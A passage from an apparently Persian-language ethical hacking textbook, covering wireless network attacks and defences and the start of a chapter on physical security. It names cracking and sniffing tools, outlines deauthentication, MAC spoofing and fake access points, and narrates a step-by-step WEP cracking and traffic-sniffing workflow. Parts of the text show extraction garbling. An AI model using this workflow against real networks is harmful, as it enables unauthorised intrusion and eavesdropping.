ﻫﺮ access point ﺗﻘﻠﺒﻲ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻮﺳﻂ ﺷﺨﺼﻲ ﻛﻪ ﺑﻪ access point ﻣﺘﺼﻞ اﺳﺖ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮد از ﺟﻤﻠﻪ ﻫﻜﺮ، و دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ ﻛﺎﺑﻠﻲ را ﺑﺪﻫﺪ . ﺑﻪ ﻫﻤﻴﻦ دﻟﻴﻞ، داﺷﺘﻦ ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﺑﺮاي ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﺳﺎزﻣﺎن ﺟﻬﺖ اﺳﻜﻦ ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﺿﺮور ي اﺳﺖ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻛﻪ access point ﺗﻘﻠﺒﻲ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ اﺳﺖ . از ﺟﻤﻠﻪ اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ access point ﺗﻘﻠﺒﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ﻋﺒﺎرﺗﻨﺪ از : NetStumbler و MiniStrumbler . .

184

اﺑﺰارﻫﺎي ﻫﻚ

ClassicStumbler ، اﻃﻼﻋﺎت access point ﻫﺎﻳﻲ ﻛﻪ داﺧﻞ رﻧﺞ ﻫﺴﺘﻨﺪ را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ . .

AirFart ، ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ دﺳﺘﮕﺎه ﻫﺎي واﻳﺮﻟﺲ و ﻣﺤﺎﺳﺒﻪ ﻗﺪرت ﺳﻴﮕﻨﺎل آﻧﻬﺎ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

Hotspotter ، اﺑﺰاري ﺧﻮدﻛﺎر ﺑﺮاي ﺗﺴﺖ ﻧﻔﻮذﭘﺬﻳﺮي ﻛﻼﻳﻨﺖ ﻫﺎي واﻳﺮﻟﺲ اﺳﺖ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎي ﻫﻚ ﻋﺒﺎرﺗﻨﺪ از : ASLEAP ، AP Radar ، و Cain & Abel.

ﺗﻜﻨﻴﻚ ﻫﺎي ﻫﻚ ﺷﺒﻜﻪ واﻳﺮﻟﺲ

ﺑﺴﻴﺎري از ﺣﻤﻼت ﺑﺮاي ﻫﻚ واﻳﺮﻟﺲ، در دﺳﺘﻪ ﻫﺎي زﻳﺮ ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ : :

ﻣﻜﺎﻧﻴﺰم ﻫﺎي ﺷﻜﺴﺘﻦ رﻣﺰﮔﺬاري و اﺣﺮاز ﻫﻮﻳﺖ: اﻳﻦ ﻣﻜﺎﻧﻴﺰم ﻫﺎ، ﺷﺎﻣﻞ ﺷﻜﺴﺘﻦ ﻛﻠﻴﺪﻫﺎي اﺣﺮاز ﻫﻮﻳﺖ WEP ، WPA ، و LEAP ﺳﻴﺴﻜﻮ اﺳﺖ . ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺎ اﺳﺘﻔﺎده از آﻧﻬﺎ، ﺑﻪ ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﻣﺘﺼﻞ ﺷﻮﻧﺪ ﻳﺎ داده ﻫﺎي ﻛﺎرﺑﺮ دﻳﮕﺮي را ﺑﺪﺳﺖ آورﻧﺪ و آﻧﻬﺎ را رﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ . .

اﺳﺘﺮاق ﺳﻤﻊ: ﺑﺪﺳﺖ آوردن ﭘﺴﻮردﻫﺎ ﻳﺎ اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ دﻳﮕﺮ از ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﻏﻴﺮ رﻣﺰ ﺷﺪه ﻳﺎ hotspot اﺳﺖ . .

DoS :DoS ﺑﺎ اﻳﺠﺎد ﻓﺮﻛﺎﻧﺲ رادﻳﻮي ﻗﻮي ﺗﺮ از ﻓﺮﻛﺎﻧﺴﻲ ﻛﻪ Access Point ارﺳﺎل ﻣﻲ ﻛﻨﺪ، در ﻻﻳﻪ ﻓﻴﺰﻳﻜﻲ اﻧﺠﺎم ﻣﻲ ﮔﻴﺮد و ﺳﺒﺐ از ﻛﺎر اﻓﺘﺎدن access point ﻣﻲ ﺷﻮد و ﻛﺎرﺑﺮان ﺑﻪ ﻳﻚ access point ﺳﺎﺧﺘﮕﻲ، وﺻﻞ ﻣﻲ ﺷﻮﻧﺪ . DoS ، در ﻻﻳﻪ LLC ﺑﺎ اﻳﺠﺎد ﻓﺮﻳﻢ ﻫﺎي deauthentication ( ﺣﻤﻼت death ) ﻳﺎ ﺑﺎ ﺗﻮﻟﻴﺪ ﭘﻴﻮﺳﺘﻪ ﻓﺮﻳﻢ ﻫﺎي ﺳﺎﺧﺘﮕﻲ، اﻧﺠﺎم ﻣﻲ ﮔﻴﺮد . .

AP masquerading ﻳﺎ access point : spoofing ﻫﺎي ﺳﺎﺧﺘﮕﻲ، ﺑﺎ ﺗﻨﻈﻴﻢ SSID ﻳﺎ ﻧﺎم ﺷﺒﻜﻪ، ﺧﻮد را ﺑﻪ ﻋﻨﻮان ﻳﻚ access point ﻗﺎﻧﻮﻧﻲ واﻧﻤﻮد ﻣﻲ ﻛﻨﺪ . .

MAC spoofing: ﻫﻜﺮ، ﺧﻮد را ﺑﻪ ﻋﻨﻮان ﻳﻚ ﻛﻼﻳﻨﺖ واﻳﺮﻟﺴﻲ ﺟﺎ ﻣﻲ زﻧﺪ و ﺑﺎ ﺟﻌﻞ MAC address ﻛﺎرﺑﺮ دﻳﮕﺮ، MAC filtering را دور ﻣﻲ .زﻧﺪ .زﻧﺪ

در ﺻﻮرﺗﻴﻜﻪ access point ﺑﻪ درﺳﺘﻲ اﻣﻦ ﻧﺸﻮد، ﻫﻜﺮ ﺑﻪ آﺳﺎﻧﻲ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﻧﻔﻮذ ﻛﻨﺪ . روش ﻫﺎي زﻳﺎدي ﺑﺮاي ﺳﻮاﺳﺘﻔﺎده از ﻧﻘﺎط ﺿﻌﻒ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ وﺟﻮد دارد.

185

ﻣﺮاﺣﻞ ﻫﻚ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ

ﻫﻜﺮ در اوﻟﻴﻦ ﮔﺎم، ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار NetStumbler در ﻣﺤﻴﻂ ﺑﻪ دﻧﺒﺎل ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻓﻌﺎل ﻣﻲ ﮔﺮدد . . ﺳﭙﺲ از اﺑﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن kismet ﻳﺎ NetStumbler اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﻔﻬﻤﺪ آﻳﺎ ﺷﺒﻜﻪ اي رﻣﺰ ﺷﺪه اﺳﺖ ﻳﺎ ﻧﻪ و ﺳﭙﺲ ﺷﺒﻜﻪ اي را ﺑﺮاي ﻫﻚ اﻧﺘﺨﺎب ﻣﻲ ﻛﻨﺪ . ﭘﺲ از آن، ﺷﺒﻜﻪ را آﻧﺎﻟﻴﺰ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻧﺤﻮه رﻣﺰﮔﺬاري ﺷﺒﻜﻪ، Access point ﻫﺎ، SSID و ... را ﻛﺸﻒ ﻛﻨﺪ . در ﻣﺮﺣﻠﻪ ﭼﻬﺎرم، ﻫﻜﺮ وﺿﻌﻴﺖ ﻛﺎرت ﺷﺒﻜﻪ را روي monitor mode ﺗﻨﻈﻴﻢ ﻣﻲﻛ ﻨﺪ و ﺑﺎ اﺳﺘﻔﺎده از Airdump ، ﺑﺴﺘﻪ ﻫﺎ را capture ﻣﻲ ﻛﻨﺪ . Airdump ، ﺳﺮﻳﻌﺎ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﺑﻪ ﻫﻤﺮاه SSID آﻧﻬﺎ را ﻟﻴﺴﺖ ﻣﻲ ﻛﻨﺪ و ﺷﺮوع ﺑﻪ capture ﻛﺮدن ﺑﺴﺘﻪ ﻫﺎ ﻣﻲ ﻛﻨﺪ . ﭘﺲ از ﭼﻨﺪ ﺳﺎﻋﺖ، Aircrack را اﺟﺮا ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺷﺮوع ﺑﻪ ﻛﺮك ﻛﻨﺪ و ﻛﻠﻴﺪ را ﻛﺸﻒ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﻛﻠﻴﺪ WEP ﻛﺸ ﻒ ﺷﺪ، ﻫﻜﺮ، ﻛﺎرت ﺷﺒﻜﻪ را ﺑﻄﻮر ﺻﺤﻴﺢ ﺗﻨﻈﻴﻢ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﻪ ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﻣﺘﺼﻞ ﺷﻮد و ﺑﺎ اﺳﺘﻔﺎده از WireShark ، ﺷﺮوع ﺑﻪ ﮔﻮش دادن ﺑﻪ ﺷﺒﻜﻪ ﻣﻲ ﻛﻨﺪ و ﺑﻪ دﻧﺒﺎل ﭘﺮوﺗﻜﻞ ﻫﺎي ﻏﻴﺮ رﻣﺰ ﺷﺪه از ﻗﺒﻴﻞ POP ، FTP و Telnet ﻣﻲ ﮔﺮدد . .

186

روش ﻫﺎﻳﻲ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ

اﺑﺰارﻫﺎي ﻫﻚ

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي اﺳﻜﻦ در ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻋﺒﺎرﺗﻨﺪ از : : AP Scanner ، StumbVerter ، WaveStumbler ، Mognet ، MacStumbler ، PrismStumbler ، Kismet ، Wifi Finder ، AirTraf ، Wireless Security Auditor ، و eEye Retina WIFI . .

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي اﺳﺘﺮاق ﺳﻤﻊ در ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻋﺒﺎرﺗﻨﺪ از : : EtherPEG ، vxSniffer ، Aerosol ، VPNmonitoral ، WireShark ، NAI Wireless Sniffer ، AiroPeek ، ssidsniff ، WinDump ، DriftNet . .

روش ﻫﺎي اﻣﻦ ﺳﺎزي ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ

از آﻧﺠﺎﺋﻴﻜﻪ ﺗﻜﻨﻮﻟﻮژي واﻳﺮﻟﺲ در ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺗﻜﻨﻮﻟﻮژي ﻛﺎﺑﻠﻲ، ﺟﺪﻳﺪﺗﺮ اﺳﺖ، ﺑﺮاي اﻣﻦ ﺳﺎزي آن، ﮔﺰﻳﻨﻪ ﻫﺎي ﻛﻤﺘﺮي وﺟﻮد دارد . روش ﻫﺎي اﻣﻨﻴﺘﻲ را ﻣﻲ ﺗﻮان ﺑﺎ اﺳﺘﻔﺎده از ﻻﻳﻪ ﻫﺎي ﻣﺪل OSI ، ﺗﻘﺴﻴﻢ ﺑﻨﺪي ﻛﺮد . .

187

روش ﻫﺎي اﻣﻦ ﺳﺎزي در ﺳﻄﺢ ﻻﻳﻪ 2 ﻋﺒﺎرﺗﻨﺪ از : :

WPA • WPA2 • 802.11i •

روش اﻣﻦ ﺳﺎزي در ﺳﻄﺢ ﻻﻳﻪ 3 ﻋﺒﺎرﺗﻨﺪ از : :

• IPSec ﻳﺎ SSL VPN

روش اﻣﻦ ﺳﺎزي در ﺳﻄﺢ ﻻﻳﻪ 7 ﻋﺒﺎرﺗﻨﺪ از : :

• HTTPS ، SSH ، و FTPS.

ﺑﺮﺧﻲ دﻳﮕﺮ از روش ﻫﺎي اﻣﻦ ﺳﺎزي ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻋﺒﺎرﺗﻨﺪ از : :

• MAC Filtering : ﻟﻴﺴﺘﻲ از MAC Address ﻛﻼﻳﻨﺖ ﻫﺎي ﻣﺠﺎز را ﺗﻬﻴﻪ و در دﺳﺘﮕﺎه ﻫﺎي ﻣﺮﻛﺰي واﻳﺮﻟﺲ ﺗﻨ ﻈﻴﻢ ﻛﻨﻴﺪ. • SSID : SSID ﭘﻴﺶ ﻓﺮض را ﺗﻐﻴﻴﺮ دﻫﻴﺪ. • ﻓﺎﻳﺮوال : ﺑﺮاي اﻣﻦ ﺳﺎزي ﺷﺒﻜﻪ واﻳﺮﻟﺲ، از ﻓﺎﻳﺮوال اﺳﺘﻔﺎده ﻛﻨﻴﺪ ﺗﺎ ﺟﻠﻮي دﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎز را ﺑﮕﻴﺮﻳﺪ. • ﺑﺮ روي ﺗﻤﺎم دﺳﺘﮕﺎه ﻫﺎي واﻳﺮﻟﺲ، ﭘﺴﻮرد ﻗﺮار دﻫﻴﺪ. • ﺑﺮ روي access point ﻫﺎي ﺷﺒﻜﻪ، broadcasting را ﻏﻴﺮ ﻓﻌﺎل ﻛﻨﻴﺪ. • ﺑﺮ روي ﺷﺒﻜﻪ ﺗﺎن، ﻣﺎﻧ ﻲ اﻧﺘﺨﺎب ﻧﻜﻨﻴﺪ ﻛﻪ ﻣﺸﺨﺺ ﻛﻨﻨﺪه ﺷﺮﻛﺖ ﺷﻤﺎ ﺑﺎﺷﺪ. • Access point ﻫﺎ را ﺑﻪ دور از ﭘﻨﺠﺮه ﻗﺮار دﻫﻴﺪ. • DHCP را ﻏﻴﺮﻓﻌﺎل ﻛﻨﻴﺪ و از IP دﺳﺘﻲ اﺳﺘﻔﺎده ﻛﻨﻴﺪ. • اﺟﺎزه ﻣﺪﻳﺮﻳﺖ از راه دور را ﺑﻪ access point ﻫﺎ ﻧﺪﻫﻴﺪ. • در access point ﻫﺎ، از رﻣﺰﮔﺬاري اﺳﺘﻔﺎده ﻛﻨﻴﺪ. • Firmware ﻫﺎﻳﺘﺎن را ﺑﻄﻮرﻣﻨﻈﻢ، ﺑﻪ روز ﻛﻨﻴﺪ. • داده ﻫﺎ را در ﻻﻳﻪ اﭘﻠﻴﻜﺸﻦ، رﻣﺰﮔﺬاري ﻛﻨﻴﺪ از ﻗﺒﻴﻞ SSL. • ﺗﻤﺎم ﺗﻨﻈﻴﻤﺎت ﭘﻴﺶ ﻓﺮض access point از ﻗﺒﻴﻞ آدرس IP را ﺗﻐﻴﻴﺮ دﻫﻴﺪ. • اﻣﻨﻴﺖ ﺷﺒﻜﻪ واﻳﺮﻟﺲ را ﺑﺼﻮرت ﻣﺮﺗﺐ ﺗﺴﺖ ﻛﻨﻴﺪ. • از VPN در ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﺧﻮد اﺳﺘﻔﺎده ﻛﻨﻴﺪ.

188

ﻓﺼﻞ ﻳﺎزدﻫﻢ

اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ

ﻣﻘﺪﻣﻪ

اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ، ﻳﻜﻲ از ﻣﻬﻢ ﺗﺮﻳﻦ ﺑﺨﺶ ﻫﺎي اﻣﻨﻴﺖ IT ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از از دﺳﺖ دادن ﻳﺎ ﺳﺮﻗﺖ داده ﻫﺎي ﻣﺤﺮﻣﺎﻧﻪ و ﺣﺴﺎس اﺳﺖ . اﮔﺮ ﺳﺎزﻣﺎﻧﻲ ﻧﺘﻮاﻧﺪ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺒﺳﺎﻨﻣ ﻲ را ﻓﺮاﻫﻢ آورد، آﻧﮕﺎه ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﻓﻨﻲ دﻳﮕﺮ از ﻗﺒﻴﻞ ﻓﺎﻳﺮوال ﻫﺎ و IDS ﻫﺎ ﻧﻴﺰ ﻣﻲ ﺗﻮاﻧﻨﺪ دور زده ﺷﻮﻧﺪ . .

ﺟﻤﻠﻪ اي وﺟﻮد دارد ﻛﻪ ﻣﻲ ﮔﻮﻳﺪ " زﻣﺎﻧﻴﻜﻪ ﺷﻤﺎ داﺧﻞ ﺷﺪﻳﺪ، ﺷﺒﻜﻪ ﻣﺎل ﺷﻤﺎﺳﺖ" . ﺑﺎ اﻣﻦ ﺳﺎزي ﻓﻴﺰﻳﻜﻲ ﺷﺒﻜﻪ و ﺳﺎزﻣﺎن ﺗﺎن، از ﺳﺮﻗﺖ ﺗﺠﻬﻴﺰاﺗﻲ ﻫﻤﭽﻮن ﻟﭗ ﺗﺎپ ﻫﺎ ﻳﺎ دراﻳﻮﻫﺎي tape ، ﺟﺎﺳﺎزي keylogger ﻫﺎ روي ﺳﻴﺴﺘﻢ ﻫﺎ، و ﻗﺮار دادن access point ﻫﺎ روي ﺷﺒﻜﻪ، ﺟﻠﻮﮔﻴﺮي ﻣﻲ ﻛﻨﻴﺪ . اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ، ﺑﻪ اﺷﺨﺎص واﺑﺴﺘﻪ اﺳﺖ ﺑﻨﺎﺑﺮاﻳﻦ، ﻣﺴﺘﻌﺪ ﺣﻤﻼت ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ اﺳﺖ ﻣﺜﻼ ورود ﺑﻪ ﺳﺎﺧﺘﻤﺎن ﭘﺸﺖ ﺳﺮ ﻳﻚ ﻛﺎرﻣﻨﺪ و ﻋﺪم اراﺋﻪ ﻛﺎرت ﺷﻨﺎﺳﺎﻳﻲ ﻳﺎ ﻛﻠﻴﺪ ( ﺑﻨﺎﺑﺮاﻳﻦ، دور زدن ﻣﺸﻜﻞ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ .) .)

روﻳﺪادﻫﺎي ﻧﻘﺾ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ

ﻫﺮ روزه، ﺧﺒﺮﻫﺎي زﻳﺎدي ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮد ﻛﻪ ﺑﻴﺎن ﻣﻲ ﻛﻨﻨﺪ در دوﻟﺖ ﻳﺎ ﺷﺮﻛﺖ ﻫﺎي ﺑﺰرگ، ﻳﻜﺴﺮي از اﻃﻼﻋﺎت ﻣﺸﺘﺮﻳﺎن ﺑﻪ ﺧﻄﺮ ﻣﻲ اﻓﺘﺪ و اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ ﻛﺎرﻣﻨﺪان اﻓﺸﺎ ﻣﻲ ﺷﻮد . ﺑﺮاي ﻣﺜﺎل، ﻣﻤﻜﻦ اﺳﺖ زﻣﺎﻧﻴﻜﻪ ﻛﺎرﻣﻨﺪي در ﺣﺎل ﻣﺴﺎﻓﺮت اﺳﺖ، در ﺳﺮﻗﺖ از ﻣﻨﺰل او، ﻳﺎ از اﺗﺎق ﻫﺘﻞ، ﻟﭗ ﺗﺎپ ﻫﻢ دزدﻳﺪه ﺷﻮد . اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ ﻳﺎ ﺣﺴﺎس ﻛﻪ ﺑﻪ دﺳﺖ ﻫﻜﺮ ﻣﻲ اﻓﺘﺪ ﻣﻲ ﺗﻮاﻧﺪ ﺧﻄﺮﻧﺎك ﺑﺎﺷﺪ . .

ﺳﺮﻗﺖ ﺗﺠﻬﻴﺰات، ﻳﻜﻲ از ﺣﻤﻼت راﻳﺞ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ اﺳﺖ . اﻏﻠﺐ اﻓﺮاد اﻧﺘﻈﺎر ﺳ ﻗﺮ ﺖ ﻛﺎﻣﭙﻴﻮﺗﺮﺷﺎن ار ﺪﻧراﺪﻧ ﺪﻧراﺪﻧ ار ﺑﻨﺎﺑﺮاﻳﻦ در ﻣﻮرد ﻗﻔﻞ ﻛﺮدن ﺳﻴﺴﺘﻢ ﻫﺎﻳﺸﺎن، ﺑﻲ ﺗﻮﺟﻬﻲ ﻣﻲ ﻛﻨﻨﺪ و ﺗﻨﻬﺎ ﺑﻪ ﻣﻜﺎﻧﻴﺰم ﻫﺎي اﺳﺘﺎﻧﺪارد اﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ ا ﺎﻔﺘﻛ ﺎﻔﺘﻛ ﻣﻲ ﻛﻨﻨﺪ . .

190

ﺑﺴﻴﺎري از ﺣﻤﻼت داﺧﻠﻲ، در ﻧﺘﻴﺠﻪ ﻧﻘﺾ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ اﺳﺖ . زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ دﺳﺘ ﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺳﺮور، ﻳﺎ ﻳﻚ ﻛﻼﻳﻨﺖ، ﻳﺎ ﻳﻚ ﭘﻮرت ﺷﺒﻜﻪ ﭘﻴﺪا ﻛﻨﺪ، ﻧﺘﺎﻳﺞ آن ﻣﻲ ﺗﻮاﻧﺪ ﻣﺨﺮب ﺑﺎﺷﺪ . ﺑﺮﺧﻲ از ﺿﻌﻒ ﻫﺎي اﻣﻨﻴﺘﻲ راﻳﺞ ﻛﻪ ﺑﻪ دﻟﻴﻞ ﻛﻤﺒﻮد اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﻪ وﺟﻮد ﻣﻲ آﻳﻨﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• ﻧﺼﺐ ﻧﺮم اﻓﺰارﻫﺎﻳﻲ از ﻗﺒﻴﻞ keylogger ﻫﺎ، وﻳﺮوس ﻫﺎ، ﺗﺮوﺟﺎن ﻫﺎ، backdoor ﻫﺎ، ﻳﺎ rootkit ﻫﺎ • ﺷﻨﺎﺳﺎﻳﻲ و ﺑﺪﺳﺖ آوردن اﻃﻼﻋﺎت اﺣﺮاز ﻫﻮﻳﺘﻲ از ﻗﺒﻴﻞ ﭘﺴﻮردﻫﺎ ﻳﺎ ﮔﻮاﻫﻲ ﻫﺎ • ارﺗﺒﺎط ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺷﺒﻜﻪ ﻛﺎﺑﻠﻲ ﺟﻬﺖ اﺳﺘﺮاق ﺳﻤﻊ اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ از ﻗﺒﻴﻞ ﭘﺴﻮردﻫﺎ و ﺷﻤﺎره ﻫﺎي ﻛﺎرت اﻋﺘﺒﺎري • دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺮاي ﺟﻤﻊ آوري داده ﻫﺎﻳﻲ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨ ﺪ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮردﻫﺎي ذﺧﻴ ﺮه ﺷﺪه روي ﺳﻴﺴﺘﻢ ﻣﺤﻠﻲ اﺳﺘﻔﺎده ﺷﻮﻧﺪ • ﻓﺮﺻﺖ ﺑﺮاي ﻗﺮار دادن access point ﺗﻘﻠﺒﻲ در ﺷﺒﻜﻪ ﺑﺮاي اﻳﺠﺎد ﻳﻚ ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﺑﺎز ﺑﺎ اﻣﻜﺎن دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ ﻛﺎﺑﻠﻲ • ﺳﺮﻗﺖ ﻣﺴﺘﻨﺪات ﻛﺎﻏﺬي ﻳﺎ اﻟﻜﺘﺮوﻧﻴﻜﻲ • ﺳﺮﻗﺖ اﻃﻼﻋﺎت ﺣﺴﺎس ﻓﻜﺲ • ﺣﻤﻠﻪ آﺷﻐﺎل ﮔﺮدي ( ﺗﺎﻛﻴﺪ ﺑﺮ ﺧﺮد ﻛﺮدن اﺳﻨﺎد ﻣﻬﻢ ) )

اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ

ﺑﻄﻮر ﻛﻠﻲ، ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﺑﻪ ﺳﻪ روش زﻳﺮ دﺳﺘﻪ ﺑﻨﺪي ﻣﻲ ﺷﻮد : :

ﻓﻴﺰﻳﻜﻲ: ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎ، ﺷﺎﻣﻞ ﻧﮕﻬﺒﺎﻧﺎن اﻣﻨﻴﺘﻲ، روﺷﻨﺎﻳﻲ، ﺣﺼﺎر، ﻗﻔﻞ ﻫﺎ، و آﻻرم ﻫﺎ ﻫﺴﺘﻨﺪ . ﺑﺎﻳﺴﺘﻲ ﻧﻘﺎط دﺳﺘﺮﺳﻲ ﺳﺎﺧﺘﻤﺎن، ﻣﺤﺪود ﺑﺎﺷﺪ و ﺗﻮﺳﻂ دورﺑﻴﻦ ﻫﺎي CCTV و آﻻرم ،ﻫﺎ ﻣﺎﻧﻴﺘﻮر و ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ . ورود ﺑﻪ ﺳﺎﺧﺘﻤﺎن ﺗﻨﻬﺎ ﺑﺮاي اﻓﺮاد ﻣﺠﺎز ﻣﺤﺪود ﺷﻮد . دﺳﺘﺮﺳﻲ ﺑﻪ ﻟﭗ ﺗﺎپ ﻫﺎ و ﻛﻮل دﻳﺴﻚ ﻫﺎ، tape ﻫﺎ، و دﻳﺴﻚ ﻫﺎ ﻣﺤﺪود و ﺑﺼﻮرت ﻣﺤﺎﻓﻈﺖ ﺷﺪه ﺑﺎﺷﺪ . ﺻﻔﺤﻪ ﻣﺎﻧﻴﺘﻮر از دﻳﺪ اﻓﺮادي ﻛﻪ در ﺣﺎل ﻋﺒﻮر ﻫﺴﺘﻨﺪ، ﻣﺨﻔﻲ ﺑﺎﺷﺪ و ﺳﻴﺎﺳﺘﻲ ﭘﻴﺎده ﺳﺎزي ﺷﻮد ﻛﻪ ﻛﺎرﺑﺮان را اﻟﺰام ﻛﻨﺪ زﻣﺎﻧﻴﻜﻪ ﺑﻪ ﻫﺮ دﻟﻴﻠﻲ ﻛﺎﻣﭙﻴﻮﺗﺮﺷﺎن را ﺗﺮك ﻣﻲ ﻛﻨﻨﺪ، آن را ﻗﻔﻞ ( lock ) ﻛﻨﻨﺪ . ﺳﻴﺴﺘﻢ ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮي ﻛﻪ داراي اﻃﻼﻋﺎت ﺣﺴﺎﺳﻲ ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ در ﻣﺤﻴﻄﻲ ﺑﺴﺘﻪ و ﻗﻔﻞ ﺷﺪه، ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻣﺜﻼ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ اﺗﺎق ، ﻧﻴﺎز ﺑﻪ اﺣﺮاز ﻫﻮﻳﺖ داﺷﺘﻪ ﺑﺎﺷﺪ و درب رك ﻗﻔﻞ ﺑﺎﺷﺪ و ... .

ﻓﻨﻲ: ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﻓﻨﻲ از ﻗﺒﻴﻞ ﻓﺎﻳﺮوال ﻫﺎ، IDS ، ﻓﻴﻠﺘﺮﻳﻨﮓ ﻣﺤﺘﻮاي spyware ، و اﺳﻜﻦ وﻳﺮوس و ﺗﺮوﺟﺎن ﺑﺎﻳﺪ روي ﺗﻤﺎم ﻛﻼﻳﻨﺖ ﻫﺎ، ﺷﺒﻜﻪ ﻫﺎ و ﺳﺮورﻫﺎي را ه دور، ﭘﻴﺎده ﺳﺎزي ﺷﻮد . .

191

ﻋﻤﻠﻴﺎﺗﻲ: ﺑﺎﻳﺪ ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﻋﻤﻠ ﻴﺎﺗﻲ ﺑﺮاي آﻧﺎﻟﻴﺰ ﺗﻬﺪﻳﺪات و اﻧﺠﺎم ارزﻳﺎﺑﻲ رﻳﺴﻚ ، در ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﺳﺎزﻣﺎن، ﻣﺴﺘﻨﺪ ﺷﻮد . .

ﺿﺮورت اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﭼﻴﺴﺖ؟

